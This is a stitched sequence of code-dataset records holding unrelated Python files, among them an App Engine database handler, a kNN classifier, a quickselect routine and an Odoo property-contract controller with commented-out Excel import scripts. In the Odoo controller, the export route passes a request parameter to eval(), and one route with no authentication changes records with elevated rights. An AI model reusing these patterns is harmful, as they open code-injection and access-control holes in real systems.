len(barr)-offset, \"remain.\")\n DP.leave()\n return True\n","sub_path":"modtrack/loadmod.py","file_name":"loadmod.py","file_ext":"py","file_size_in_byte":7824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"132159810","text":"'''\nThis script adds entry to the database Series.\nThis script is used by Admin to reset the database to default value.\n'''\nfrom google.appengine.ext import db\nimport webapp2\nimport json\nimport logging\n\nclass Series(db.Model):\n tvid = db.StringProperty(required=True)\n title = db.StringProperty(required=True)\n status = db.IntegerProperty()\n epname = db.StringProperty()\n epinfo = db.StringProperty()\n epdate = db.StringProperty()\n rely = db.IntegerProperty()\n up_cycle = db.IntegerProperty()\n\nclass Add2Series(webapp2.RequestHandler):\n def get(self):\n logging.info(\"GET request received\")\n query = Series.all()\n query.order(\"tvid\") \n\n for q in query.run():\n self.response.write(q.tvid)\n self.response.write(\"\\t\")\n self.response.write(q.title)\n self.response.write(\"\\t\")\n self.response.write(q.status)\n self.response.write(\"\\n\")\n self.response.write(q.epname)\n self.response.write(\"\\n\")\n self.response.write(q.epinfo)\n self.response.write(\"\\n\")\n self.response.write(q.epdate)\n self.response.write(\"\\n\")\n self.response.write(q.rely)\n self.response.write(\"\\n\")\n\n logging.info(\"Request Successfully Executed\")\n\n def post(self):\n logging.info(\"POST Request received\")\n jsbody = self.request.body\n data = json.loads(jsbody)\n\n rtvid = data['tvid']\n rname = data['name']\n rstat = data['status']\n repname = data['epname']\n repinfo = data['epinfo']\n repdate = data['epdate']\n rrely = data['rely']\n rup_cycle = data['up_cycle']\n \n logging.debug(\"name = \" + rname)\n logging.debug(\"tvid = \" + str(rtvid))\n logging.debug(\"status = \" + str(rstat))\n logging.debug(\"epname = \" + repname)\n logging.debug(\"epinfo = \" + str(repinfo))\n logging.debug(\"epdate = \" + str(repdate))\n logging.debug(\"rely = \" + str(rrely))\n logging.debug(\"up_cycle = \" + str(rup_cycle))\n\n ''' \n series = Series.all()\n series.filter('tvid = ', str(rtvid))\n entry = series.get()\n '''\n\n entry = Series(tvid=rtvid, title=rname)\n \n entry.epname = repname\n entry.epinfo = repinfo\n entry.epdate = repdate\n entry.rely = rrely\n entry.status = rstat\n entry.up_cycle = rup_cycle\n \n entry.put()\n\n logging.debug(\"Entry added to Database\")\n logging.info(\"Request successfully executed\")\n\n self.response.write(\"Added \" + rtvid)\n\n\napplication = webapp2.WSGIApplication([(\"/add\", Add2Series),],debug=True)\n","sub_path":"add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"547188130","text":"VERSION = '0.2'\n\nPROJECT_HOMEPAGE = 'https://udger.com'\n\nINI_FILE_URL_TEMPLATE = 'http://data.udger.com/{access_key}/udgerdata_old.ini'\n\nDEFAULT_TMP_DIR = '/tmp'\n\nEMPTY_RESULT = {\n 'type': None,\n 'ua_family': None,\n 'ua_name': None,\n 'ua_url': None,\n 'ua_company': None,\n 'ua_company_url': None,\n 'ua_icon': PROJECT_HOMEPAGE + '/pub/img/ua/unknown.png',\n 'ua_udger_url': None,\n 'device_name': None,\n 'device_icon': PROJECT_HOMEPAGE + '/pub/img/device/unknown.png',\n 'device_udger_url': None,\n 'os_family': None,\n 'os_name': None,\n 'os_url': None,\n 'os_company': None,\n 'os_company_url': None,\n 'os_icon': PROJECT_HOMEPAGE + '/pub/img/os/unknown.png',\n}\n","sub_path":"udger/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"570037665","text":"import numpy as np\nfrom scipy.spatial import distance\nimport pickle\nimport numpy as np\nimport math\nfrom collections import Counter\n\n###Distance Metric : L2 ###\nclass KNearestNeighbor(object):\n \"\"\" a kNN classifier with L2 distance \"\"\"\n\n def __init__(self):\n pass\n\n def train(self, X, y):\n \"\"\"\n \n \"\"\"\n self.X_train = X\n self.y_train = y\n \n def predict(self, X, k):\n \n dists=self.compute_distances(X)\n return self.predict_labels(dists, k=k)\n \n \n def compute_distances(self, X):\n\n val = X.toarray()\n train = self.X_train.toarray()\n dists = [[] for i in range(len(val))]\n\n for i in range(0,len(val)):\n for j in range(0,len(train)):\n distances = distance.euclidean(val[i],train[j])\n dists[i].append([distances,self.y_train[j]])\n \n return dists\n\n def predict_labels(self, dists,k):\n \n y_pred = []\n for i in range(0,len(dists)):\n res_list = []\n k_smallest = []\n \n dists[i]=sorted(dists[i], key=lambda x: x[0])\n \n for j in range(0,k):\n k_smallest.append(dists[i][j]) \n count = Counter([x[1] for x in k_smallest])\n y_pred.append(count.most_common()[0][0])\n \n return y_pred\n\n","sub_path":"k_nearest_neighbor.py","file_name":"k_nearest_neighbor.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"505949585","text":"#\n# select returns the k-th smallest element of a\n#\ndef select(a, k):\n b = sorted(a)\n return b[k]\n\n# Implement the function quick_select.\n# It also returns the k-th smallest element of a.\ndef partition(a, lo, hi):\n p = (lo + hi)//2\n pivot = a[p]\n a[p] = a[hi] # Swap pivot with last item\n a[hi] = pivot\n\n i = lo - 1\n j = hi\n while i < j: \n i += 1 \n while a[i] < pivot: \n i += 1\n j -= 1\n while a[j] > pivot and j > lo: \n j -= 1\n if i < j:\n a[i], a[j] = a[j], a[i]#t = a[i]; a[i] = a[j]; a[j] = t # swap a[i] and a[j]\n a[hi] = a[i]\n a[i] = pivot # Put pivot where it belongs\n return i # index of pivot\n\ndef qs(a, k, lo, hi):\n if lo < hi:\n pivotIndex = partition(a, lo, hi)\n if pivotIndex == k:\n return a[k]\n elif pivotIndex > k:\n return qs(a, k, lo, pivotIndex - 1)\n return qs(a, k, pivotIndex + 1, hi)\n return a[k]\n\ndef quick_select(a, k):\n return qs(a, k, 0, len(a)-1)\n\n","sub_path":"CS206_DS/8_selection.py","file_name":"8_selection.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"71292906","text":"# Filename: q5_compute_series.py\n# Author: Ang Yong Loong\n# Class: 5C23\n# Created: 20022013\n# Modified: 20022013\n# Description: Program to compute series\n\ndef m(i):\n a = 1\n answer = 0\n while a<=i:\n answer= answer + 1/(2*a-1) - 1/(2*a+1)\n a=a+2\n answer = 4*answer\n return(answer)\n\n#main\nprint(\"i m(i)\")\nfor x in range(1,20,2):\n print('{0:<5}'.format(x),'{0:<10.11f}'.format(m(x)))\n\ninput(\"\\n\\nPlease hit the enter key to exit.\")\nexit()\n","sub_path":"practical03/q5_compute_series.py","file_name":"q5_compute_series.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"544284907","text":"def isPalin(given):\n return str(given)==str(given)[::-1]\ndef bruteForce():\n a, b = 999, 999;\n largest = 0;\n while(a > 99):\n while(b > 99):\n if(a*b > largest):\n if(isPalin(a*b)):\n largest = a*b\n else: break;\n b -= 1;\n a -= 1;\n b = 999;\n return largest;\nprint(bruteForce());\n","sub_path":"project_euler4.py","file_name":"project_euler4.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"102481781","text":"# -*- coding: utf-8 -*-\nimport xlrd\nimport os\n\nimport odoo\nimport logging\nimport xlwt\n\nfrom odoo import http\nfrom odoo.http import request\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT as DATETIME_FORMAT, DEFAULT_SERVER_DATE_FORMAT as DATE_FORMAT\nfrom odoo.exceptions import ValidationError\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom odoo.addons.web_export_view_good.controllers.controllers import ExcelExportView, content_disposition\nfrom odoo.addons.anxe_property.models.property_contract import COMPUTE_PERIOD\n\nimport json\n\n_logger = logging.getLogger(__name__)\n\n\ndef clean_excel_rows(rs):\n for i, r in enumerate(rs):\n if isinstance(r, str) or isinstance(r, unicode):\n rs[i] = r.replace('\\n', '').strip()\n\n\ndef get_customer_id(n):\n partner_obj = request.env['partner'].sudo()\n company_obj = request.env['res.company'].sudo()\n # 获取商户\n if not n:\n return False\n c_category_id = request.env.ref('anxe_core.customer_category_1').id\n r = partner_obj.search([('name', '=', n), ('c_category_id', '!=', False)], limit=1)\n if not r:\n # 创建对应公司\n c = company_obj.create({\n 'name': n,\n 'street': '0',\n 'phone': '0'\n })\n r = partner_obj.create({'name': n, 'c_category_id': c_category_id, 'main_mobile': '0', 'company_id': c.id})\n return r.id\n\n\ndef get_supplier_id(n):\n partner_obj = request.env['partner'].sudo()\n if not n:\n return False\n s_category_id = request.env.ref('anxe_core.supplier_category_1').id\n r = partner_obj.search([('name', '=', n), ('s_category_id', '!=', False)], limit=1)\n if not r:\n r = partner_obj.create({'name': n, 's_category_id': s_category_id, 'main_mobile': '0', 'company_id': 1})\n return r.id\n\n\ndef get_core_value_id(n, t):\n core_value_obj = request.env['core.value'].sudo()\n if not n or not t:\n return False\n\n r = core_value_obj.search([('name', '=', n), ('type', '=', t)], limit=1)\n if not r:\n return False\n\n return r.id\n\n\nclass ErpExtension(http.Controller):\n pass\n\n # @http.route('/web/import_data/generate_fee_detail/', type='http', auth=\"none\")\n # def generate_fee_detail(self):\n # \"\"\"生成合同费用\"\"\"\n # contract_obj = request.env['property.contract'].sudo()\n #\n # time_now = datetime.now()\n #\n # dt = datetime(2017, 1, 1)\n # # dt = datetime(2017, 8, 29)\n # while 1:\n # print(dt)\n # contract_obj.contract_fee_generate(dt=dt.strftime(DATE_FORMAT))\n # dt = dt + relativedelta(days=7)\n # if dt > time_now:\n # break\n # request.env.cr.commit()\n # print('done')\n # return 'done'\n #\n # @http.route('/web/import_data/rent_account/', type='http', auth=\"none\")\n # def import_arrears_obj(self):\n # # 导入往期欠费\n # arrears_obj = request.env['arrears'].sudo()\n # partner_obj = request.env['partner'].sudo()\n #\n # path = os.path.dirname(os.path.abspath(__file__))\n #\n # data = xlrd.open_workbook(path + os.path.sep + 'rent_account.xlsx')\n # table = data.sheet_by_index(0)\n # nrows = table.nrows\n # for i in range(nrows):\n # # print i\n # if i < 1:\n # continue\n # row = table.row_values(i)\n # # 去除换行和空格\n # clean_excel_rows(row)\n #\n # partner_name = row[0] # 商户全称\n # arrears_money = row[1] # 欠款金额\n # fee_name = row[2] #费用类型\n # if not partner_name:\n # continue\n # partner = partner_obj.search([('name','=',partner_name)], limit=1)\n # if not partner:\n # print partner_name\n # # raise ValidationError(u'%s商户错误'%partner_name)\n # continue\n # arrears_obj.create({\n # 'partner_id': partner.id,\n # 'arrears_money': arrears_money,\n # 'fee_id': get_core_value_id(fee_name, 'shop_fee_type'),\n # })\n #\n # @http.route('/web/import_data/partner_shop/', type='http', auth=\"none\")\n # def import_partner_shop(self):\n # \"\"\"导入店铺\"\"\"\n # shop_obj = request.env['partner.shop'].sudo()\n # region_obj = request.env['partner.shop.region'].sudo()\n #\n # def get_region_id(n):\n # # 获取楼层区域\n # if not n:\n # return False\n # r = region_obj.search([('name', '=', n)], limit=1)\n # if not r:\n # r = region_obj.create({'name': n})\n # return r.id\n #\n # def get_cooperative_nature(n):\n # # 获取合作性质\n # if not n:\n # return False\n # if u'租用' in n:\n # r = 'rent'\n # elif u'物业托管' in n:\n # r = 'trusteeship'\n # elif u'联营' in n:\n # r = 'union'\n # else:\n # r = False\n # return r\n #\n # path = os.path.dirname(os.path.abspath(__file__))\n #\n # data = xlrd.open_workbook(path + os.path.sep + 'partner_shop4.xlsx')\n # table = data.sheet_by_index(0)\n # nrows = table.nrows\n # for i in range(nrows):\n # print i\n # if i < 3:\n # continue\n # row = table.row_values(i)\n # # 去除换行和空格\n # clean_excel_rows(row)\n #\n # region_name = row[0] # 楼层区域\n # shop_code = row[1] # 铺位编号\n # shop_name = row[2] # 铺位名称\n # area = row[3] # 商用面积\n # public_area = row[4] # 租赁面积(含公摊)\n # cooperative_nature_name = row[5] # 合作性质\n # belong_to = row[6] # 归属主体\n # attract_investment = row[7] # 招商主体\n # property_management = row[8] # 物业管理主体\n # business_management = row[9] # 商管主体\n #\n # if not shop_code:\n # continue\n # if isinstance(shop_code, float):\n # shop_code = str(int(shop_code))\n #\n # partner_shop = shop_obj.search([('code', '=', shop_code)], limit=1)\n #\n # if partner_shop:\n # continue\n #\n # shop_obj.create({\n # 'region_id': get_region_id(region_name),\n # 'code': shop_code,\n # 'name': shop_name,\n # 'area': area,\n # 'public_area': public_area,\n # 'cooperative_nature': get_cooperative_nature(cooperative_nature_name),\n # 'belong_to': belong_to,\n # 'attract_investment': attract_investment,\n # 'property_management': property_management,\n # 'business_management': business_management,\n # })\n #\n # if i % 10 == 0:\n # request.env.cr.commit()\n # print('done')\n # return 'done'\n #\n # @http.route('/web/import_data/contract/', type='http', auth=\"none\")\n # def import_contract(self):\n # \"\"\"导入合同\"\"\"\n # contract_obj = request.env['property.contract'].sudo()\n # shop_obj = request.env['partner.shop'].sudo()\n # contract_fee_obj = request.env['contract.fee'].sudo()\n # contract_bond_obj = request.env['contract.bond'].sudo()\n #\n # def get_compute_period(n):\n # if not n:\n # return False\n # if n == u'月':\n # r = 'month'\n # elif n in [u'季', u'季度']:\n # r = 'quarterly'\n # elif n == u'半年':\n # r = 'six_months'\n # elif n == u'年':\n # r = 'year'\n # elif n == u'一次性缴纳':\n # r = 'once'\n # else:\n # r = False\n # return r\n #\n # path = os.path.dirname(os.path.abspath(__file__))\n #\n # data = xlrd.open_workbook(path + os.path.sep + 'contract4.xlsx')\n # table = data.sheet_by_index(0)\n # nrows = table.nrows\n #\n # # 上一个合同\n # before_contract = None\n #\n # for i in range(nrows):\n # print i\n # if i < 2:\n # continue\n # row = table.row_values(i)\n #\n # # 去除换行和空格\n # clean_excel_rows(row)\n #\n # pay_partner_name = row[0] # 商家名称\n # shop_codes = row[1] # 店铺编号\n # partner_contact_person = row[2] # 商家联系人\n # partner_contact_phone = row[3] # 联系电话\n # public_area = row[4] # 签约面积\n # date_from = row[5] # 合同开始日期\n # date_to = row[6] # 合同截止日期\n # get_partner_name = row[7] # 合同签订方(甲方)\n # merchant_reception = row[8] # 商户对接人\n # # 合同费用\n # fee_name = row[9] # 费用类型\n # amount = row[10] # 费用金额\n # compute_period_name = row[11] # 收取方式\n # fee_date_from = row[12] # 开始时间\n # fee_date_to = row[13] # 截止时间\n # note = row[14] # 导入备注\n #\n # if note != u'无合同商户':\n # continue\n #\n # if isinstance(partner_contact_phone, float):\n # partner_contact_phone = str(int(partner_contact_phone))\n #\n # date_from = xlrd.xldate.xldate_as_datetime(date_from, 0).strftime(DATE_FORMAT) if date_from else '2017-01-01'\n # date_to = xlrd.xldate.xldate_as_datetime(date_to, 0).strftime(DATE_FORMAT) if date_to else False\n # fee_date_from = xlrd.xldate.xldate_as_datetime(fee_date_from, 0).strftime(DATE_FORMAT) if fee_date_from else False\n # fee_date_to = xlrd.xldate.xldate_as_datetime(fee_date_to, 0).strftime(DATE_FORMAT) if fee_date_to else False\n #\n # if shop_codes:\n # # 第一行\n # if pay_partner_name == u'未售':\n # continue\n #\n # pay_partner_id = get_customer_id(pay_partner_name)\n # shop_codes = shop_codes.split('/')\n # shops = shop_obj.search([('code', 'in', shop_codes)])\n # if not shops:\n # raise ValidationError(u'门店编号错误')\n #\n # contract = contract_obj.create({\n # 'pay_partner_id': pay_partner_id,\n # 'partner_shop_ids': [(6, 0, shops.ids)],\n # 'partner_contact_person': partner_contact_person,\n # 'partner_contact_phone': partner_contact_phone,\n # 'public_area': public_area,\n # 'date_from': date_from or False,\n # 'date_to': date_to or False,\n # 'get_partner_id': get_supplier_id(get_partner_name),\n # 'merchant_reception': merchant_reception,\n # 'state': 'done',\n # 'note': note,\n # })\n #\n # before_contract = contract\n #\n # # 合同费用\n # if not fee_name:\n # continue\n #\n # # 保证金\n # if fee_name == u'合同保证金':\n # contract_bond_obj.create({\n # 'contract_id': before_contract.id,\n # 'amount': amount,\n # 'done': True if compute_period_name == u'已缴纳' else False\n # })\n # else:\n # charging_method = 'auto'\n # if compute_period_name in [u'月结扣点', u'水费', u'电费']:\n # charging_method = 'not_auto'\n #\n # contract_fee_obj.create({\n # 'contract_id': before_contract.id,\n # 'fee_id': get_core_value_id(fee_name, 'shop_fee_type'),\n # 'charging_method': charging_method,\n # 'amount': amount,\n # 'compute_period': get_compute_period(compute_period_name),\n # 'date_from': fee_date_from or False,\n # 'date_to': fee_date_to or False,\n # })\n # print('done')\n # return 'done'\n #\n # @http.route('/web/import_data/shop_equipment/', type='http', auth=\"none\")\n # def import_shop_equipment(self):\n # \"\"\"导入抄表设备\"\"\"\n # equipment_obj = request.env['shop.equipment'].sudo()\n # shop_obj = request.env['partner.shop'].sudo()\n #\n # def get_equipment_type(n):\n # r = False\n # if n == u'水表':\n # r = 'water'\n # elif n == u'电表':\n # r = 'electricity'\n # return r\n #\n # path = os.path.dirname(os.path.abspath(__file__))\n #\n # data = xlrd.open_workbook(path + os.path.sep + 'shop_equipment.xlsx')\n # table = data.sheet_by_index(0)\n # nrows = table.nrows\n #\n # for i in range(nrows):\n # print i\n # if i < 2:\n # continue\n # row = table.row_values(i)\n #\n # # 去除换行和空格\n # clean_excel_rows(row)\n #\n # shop_code = row[1] # 铺位编号\n # equipment_code = row[2] # 设备编号\n # equipment_type = row[3] # 设备类型\n # multiple_rate = row[4] # 倍率\n # brand = row[5] # 品牌\n # xh = row[6] # 型号\n # installation_date = row[7] # 安装时间\n # administrators = row[8] # 设备管理人\n #\n # if not equipment_code:\n # continue\n #\n # if isinstance(shop_code, float):\n # shop_code = str(int(shop_code))\n #\n # if isinstance(equipment_code, float):\n # equipment_code = str(int(equipment_code))\n #\n # installation_date = xlrd.xldate.xldate_as_datetime(installation_date, 0).strftime(DATE_FORMAT) if installation_date else False\n # if equipment_obj.search([('code', '=', equipment_code)]):\n # continue\n # shop = shop_obj.search([('code', '=', shop_code)], limit=1)\n #\n # if not shop:\n # print(u'%s行,%s店铺没有找到' % (i+1, shop_code))\n # raise ValidationError(u'%s行,%s店铺没有找到' % (i+1, shop_code))\n #\n # equipment_obj.create({\n # 'shop_id': shop.id if shop else False,\n # 'code': equipment_code,\n # 'type': get_equipment_type(equipment_type),\n # 'multiple_rate': multiple_rate,\n # 'brand': brand,\n # 'installation_date': installation_date,\n # 'administrators': administrators,\n # })\n # print('done')\n # return 'done'\n #\n # @http.route('/web/import_data/money_get_record/', type='http', auth=\"none\")\n # def import_money_get_record(self):\n # \"\"\"收款记录\"\"\"\n # money_record_obj = request.env['money.record'].sudo()\n # partner_obj = request.env['partner'].sudo()\n # bank_account_obj = request.env['bank.account'].sudo()\n # money_order_obj = request.env['money.order'].sudo()\n #\n # path = os.path.dirname(os.path.abspath(__file__))\n #\n # data = xlrd.open_workbook(path + os.path.sep + 'money_get_record.xlsx')\n # table = data.sheet_by_index(0)\n # nrows = table.nrows\n #\n # for i in range(nrows):\n # print i\n # if i != 2:\n # continue\n # row = table.row_values(i)\n #\n # # 去除换行和空格\n # clean_excel_rows(row)\n #\n # partner_name = row[0] # 商户\n # amount = row[1] # 实际付款金额\n # period = row[2] # 缴纳费用期间\n # fee_use = row[3] # 缴纳费用用途\n # bank_account_name = row[4] # 收款方式\n # receive_number = row[5] # 入账账号\n # fee_time = row[6] # 缴费时间\n #\n # partner = partner_obj.search([('name', '=', partner_name)], limit=1)\n # if not partner:\n # raise ValidationError(u'商户:%s不存在' % partner_name)\n #\n # if isinstance(fee_time, float):\n # fee_time = str(int(fee_time))\n #\n # if fee_time:\n # try:\n # fee_time = datetime.strptime(fee_time, '%Y%m%d')\n # except Exception:\n # fee_time = datetime.strptime(fee_time, '%Y%m')\n # else:\n # fee_time = datetime.now()\n #\n # partner = partner_obj.search([('name', '=', partner_name)], limit=1)\n # if not partner:\n # raise ValidationError(u'%s用户不存在' % partner_name)\n #\n # bank_account = bank_account_obj.search([('name', '=', bank_account_name)], limit=1)\n # if not bank_account:\n # bank_account = bank_account.search([('name', '=', u'银行卡')], limit=1)\n #\n # money_orders = money_order_obj.search([('company_id', '=', 1),\n # ('partner_id', '=', partner.id),\n # ('state', '=', 'draft'),\n # ('type', '=', 'get')])\n #\n # money_record = money_record_obj.create({\n # 'partner_id': partner.id,\n # 'company_id': 1,\n # 'type': 'get',\n # 'bank_id': bank_account.id,\n # 'fee_id': get_core_value_id(fee_use, 'shop_fee_type'),\n # 'receive_number': receive_number,\n # 'amount': amount,\n # 'fee_time': fee_time,\n # 'money_order_ids': [(6, 0, money_orders.ids)]\n # })\n # # money_record.state_done()\n # print('done')\n # return 'done'\n #\n # @http.route('/web/import_data/fee_verify/', type='http', auth=\"none\")\n # def import_fee_verify(self):\n # fee_detail_obj = request.env['contract.fee.detail'].sudo()\n #\n # fee_details = fee_detail_obj.search([('state', '=', 'draft')])\n #\n # for i, f in enumerate(fee_details):\n # print('%s/%s' % (i, len(fee_details)))\n #\n # f.state_done()\n # # if i % 10 == 0:\n # # request.env.cr.commit()\n #\n # print('done')\n #\n # @http.route('/web/import_data/money_record_draft/', type='http', auth=\"none\")\n # def import_money_record_draft(self):\n # money_record_obj = request.env['money.record'].sudo()\n # money_records = money_record_obj.search([('state', '=', 'done')])\n # money_records.state_draft()\n # print('done')\n # return 'done'\n #\n # @http.route('/web/import_data/money_record_done/', type='http', auth=\"none\")\n # def import_money_record_done(self):\n # money_record_obj = request.env['money.record'].sudo()\n # money_records = money_record_obj.search([('note', '=', '冲减缴费')], order='fee_time')\n # for money_record in money_records:\n # print(money_record)\n # try:\n # money_record.state_done()\n # except Exception:\n # pass\n # request.env.cr.commit()\n # print('done')\n # return 'done'\n\n # @http.route('/web/import_data/money_draft/', type='http', auth=\"none\")\n # def import_money_record_draft(self):\n # money_record_obj = request.env['money.record'].sudo()\n # money_records = money_record_obj.search([('note', '=', '冲减缴费')], order='fee_time')\n # for money_record in money_records:\n # print(money_record)\n # try:\n # money_record.state_draft()\n # except Exception:\n # pass\n # request.env.cr.commit()\n # print('draft')\n # return 'draft'\n\n # @http.route('/web/import_data/arrears_done/', type='http', auth=\"none\")\n # def import_arrears_done(self):\n # arrears_obj = request.env['arrears'].sudo()\n # money_records = arrears_obj.search([('state', '=', 'draft')])\n # for money_record in money_records:\n # print(money_record)\n # try:\n # money_record.arrears_done()\n # except Exception:\n # pass\n # request.env.cr.commit()\n # print('done')\n # return 'done'\n #\n # @http.route('/web/import_data/arrears_draft/', type='http', auth=\"none\")\n # def import_arrears_draft(self):\n # arrears_obj = request.env['arrears'].sudo()\n # money_records = arrears_obj.search([('state', '=', 'done')])\n # for money_record in money_records:\n # print(money_record)\n # try:\n # money_record.arrears_draft()\n # except Exception:\n # pass\n # request.env.cr.commit()\n # print('draft')\n # return 'draft'\n\n # @http.route('/web/import_data/money_record_update/', type='http', auth=\"none\")\n # def import_money_record_update(self):\n # record_obj = request.env['money.record'].sudo()\n #\n # money_records = record_obj.search([('money_order_ids', '!=', False)])\n # for i, money_record in enumerate(money_records):\n # print('%s/%s' % (i, len(money_records)))\n # if money_record.fee_id:\n # money_record.fee_ids = [money_record.fee_id.id]\n #\n # source_ids = []\n # money_orders = []\n # for money_order_line in money_record.money_order_line_ids:\n # if money_order_line.money_id not in money_orders:\n # money_orders.append(money_order_line.money_id)\n #\n # for money_order in money_orders:\n # for source in money_order.source_ids:\n # if source.fee_id not in money_record.fee_ids:\n # continue\n # if money_record.contract_id and money_record.contract_id != source.contract_id:\n # continue\n # source_ids.append(source.id)\n #\n # money_record.source_ids = source_ids\n #\n # print('done')\n # return 'done'\n\n # @http.route('/web/import_data/wy_fee_adjust/', type='http', auth=\"none\")\n # def wy_fee_adjust(self):\n # adjust_obj = request.env['contract.fee.adjust'].sudo()\n # contract_obj = request.env['property.contract'].sudo()\n # contracts = contract_obj.search([])\n # for i, contract in enumerate(contracts):\n # print i\n # name = u'%s物业费调整2:2018.11.1开始' % contract.pay_partner_id.name\n # if adjust_obj.search([('name', '=', name), ('contract_id', '=', contract.id)]):\n # continue\n #\n # adjust = adjust_obj.create({\n # 'name': name,\n # 'contract_id': contract.id,\n # })\n # adjust.onchange_contract_id()\n # for line2 in adjust.line2_ids:\n # if not line2.fee_id:\n # line2.deleted = True\n # continue\n #\n # if line2.fee_id.name not in [u'物业管理费', u'公摊费', u'空调使用费']:\n # continue\n #\n # if not line2.amount:\n # continue\n #\n # if line2.date_to and line2.date_to < '2018-11-01':\n # line2.deleted = True\n # continue\n #\n # if line2.compute_period != 'month':\n # if line2.compute_period == 'quarterly':\n # line2.write({\n # 'compute_period': 'month',\n # 'amount': round(line2.amount / 3, 2)\n # })\n #\n # if line2.date_from < '2018-11-01':\n # line2.date_from = '2018-11-01'\n #\n # # 审核\n # adjust.state_done()\n #\n # if i % 10 == 0:\n # request.env.cr.commit()\n #\n # return 'done'\n\n @http.route('/web/import_data/money_record_tjsp/', type='http', auth=\"none\")\n def money_record_tjsp(self):\n \"\"\"收款记录提交审批\"\"\"\n money_record_obj = request.env['money.record'].sudo()\n approval_state_obj = request.env['record.approval.state'].sudo()\n\n money_records = money_record_obj.search([('state', '=', 'draft')])\n\n for money_record in money_records:\n if not approval_state_obj.search([('model', '=', money_record._name), ('res_id', '=', money_record.id)]):\n approval_state_obj.create({\n 'model': money_record._name,\n 'res_id': money_record.id\n })\n\n return 'done'\n\n\nclass MyExcelExportView(ExcelExportView, http.Controller):\n\n @http.route('/web/export/export_contract', type='http', auth='user')\n def export_contract(self, contract_ids, **kwargs):\n contract_obj = request.env['property.contract'].sudo()\n\n contract_ids = eval(contract_ids)\n\n contracts = contract_obj.search([('id', 'in', contract_ids)])\n\n headers = u'合同清单'\n\n data = {\n \"headers\": [\n headers,\n None,\n None,\n None,\n None,\n None,\n None,\n None,\n None,\n None,\n None,\n None,\n None,\n None,\n ],\n \"files_name\": headers,\n \"rows\": [\n [],\n [\n u\"商家名称(合同乙方)\",\n u\"店铺编号\",\n u\"商家联系人\",\n u\"联系电话\",\n u\"签约面积(m2)\",\n u\"合同开始日期\",\n u\"合同截止日期\",\n u\"合同签订人(甲方)\",\n u\"商户对接人\",\n u\"费用项目\",\n u\"费用金额\",\n u\"收取方式\",\n u\"收费开始\",\n u\"收费截止\",\n ],\n ],\n }\n\n for contract in contracts:\n shop_codes = [shop.code for shop in contract.partner_shop_ids]\n row = [\n contract.pay_partner_id.name or '',\n ','.join(shop_codes) or '',\n contract.partner_contact_person or '',\n contract.partner_contact_phone or '',\n contract.public_area or '',\n contract.date_from or '',\n contract.date_to or '',\n contract.contract_holder or '',\n contract.merchant_reception or '',\n ]\n data['rows'].append(row)\n for i, fee_line in enumerate(contract.fee_ids):\n if i == 0:\n row.append(fee_line.fee_id.name or '')\n row.append(fee_line.amount or '')\n if fee_line.compute_period:\n row.append(dict(COMPUTE_PERIOD)[fee_line.compute_period])\n else:\n row.append('')\n row.append(fee_line.date_from or '')\n row.append(fee_line.date_to or '')\n else:\n data['rows'].append([\n [],\n [],\n [],\n [],\n [],\n [],\n [],\n [],\n [],\n fee_line.fee_id.name or '',\n fee_line.amount or '',\n dict(COMPUTE_PERIOD)[fee_line.compute_period] or '',\n fee_line.date_from or '',\n fee_line.date_to or ''\n ])\n\n files_name = data.get('files_name', [])\n columns_headers = data.get('headers', [])\n rows = data.get('rows', [])\n file_address = data.get('file_address', [])\n\n return request.make_response(\n self.from_data_excel(columns_headers, [rows, file_address]),\n headers=[\n ('Content-Disposition', content_disposition(files_name)),\n ('Content-Type', self.content_type)],\n cookies={'fileToken': '1'}\n )\n\n","sub_path":"my_addons/anxe_property/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":29000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"83639800","text":"from vtkplotter import *\nimport numpy as np\n\ndata1 = np.random.randn(500)*3+10\ndata2 = np.random.randn(500)*2+ 7\n\nh1 = histogram(data1, fill=True, outline=False, errors=True)\nh2 = histogram(data2, fill=False, lc='firebrick', lw=4)\nh2.z(0.1) # put h2 in front of h1\n\nh1.scale([1, 0.2, 1]) # set a common y-scaling factor\nh2.scale([1, 0.2, 1])\n\nshow(h1, h2, bg='white', axes=1)","sub_path":"examples/basic/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"299560432","text":"#\n# Copyright (c) 2017-2019 University of Antwerp, Aloxy NV.\n#\n# This file is part of OSS-7 Testsuite\n# (see https://github.com/MOSAIC-LoPoW/oss7-testsuite).\n#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\nimport pytest\n\nfrom d7a.alp.command import Command\nfrom d7a.dll.access_profile import AccessProfile\nfrom d7a.dll.sub_profile import SubProfile\nfrom d7a.phy.channel_header import ChannelHeader, ChannelBand, ChannelCoding, ChannelClass\nfrom d7a.phy.subband import SubBand\nfrom d7a.system_files.access_profile import 